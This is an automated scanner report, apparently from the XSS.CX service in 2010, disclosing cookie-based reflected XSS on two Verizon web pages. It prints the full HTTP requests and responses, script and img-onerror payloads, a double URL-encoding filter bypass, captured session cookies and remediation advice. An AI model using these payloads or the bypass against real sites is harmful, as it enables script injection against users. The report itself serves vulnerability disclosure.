HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 73115 Expires: Sat, 20 Nov 2010 00:16:28 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:16:28 GMT Connection: close Set-Cookie: ContextInfo_State=TXbf607'><script>alert(1)</script>af83f93894c; path=/ Set-Cookie: ContextInfo_LoopQual=; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Internet </title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet ...[SNIP]... <input type='hidden' id='locationInfo' value='TXBF607'><SCRIPT>ALERT(1)</SCRIPT>AF83F93894C ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e20b%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253efd5bffbcc6f was submitted in the vzapps cookie. This input was echoed as 4e20b"><img src=a onerror=alert(1)>fd5bffbcc6f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the vzapps cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /residential/specialoffers/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX4e20b%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253efd5bffbcc6f; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET ETag: X-Powered-By: ASP.NET Content-Type: text/html Expires: Sat, 20 Nov 2010 00:15:44 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:15:44 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: ASPSESSIONIDQQCTSBDQ=IGIKCPNBAEMHJEFBAIDLEPPI; path=/ Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660;path=/ Content-Length: 126538
<!-- Vignette V6 Fri Nov 19 16:15:44 2010 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head>
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 55f0d<script>alert(1)</script>c68ab98df45 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /residentialhelp/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX55f0d<script>alert(1)</script>c68ab98df45; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 175791 Expires: Sat, 20 Nov 2010 00:22:06 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:22:06 GMT Connection: close
<HTML xmlns:vz> <HEAD id="ctl00_head"><title> Verizon | Residential Support </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251" /><meta content="Microsoft Vis ...[SNIP]... </strong>, TX55f0d<script>alert(1)</script>c68ab98df45 </span> ...[SNIP]...
Report generated by XSS.CX at Fri Nov 19 19:05:57 CST 2010.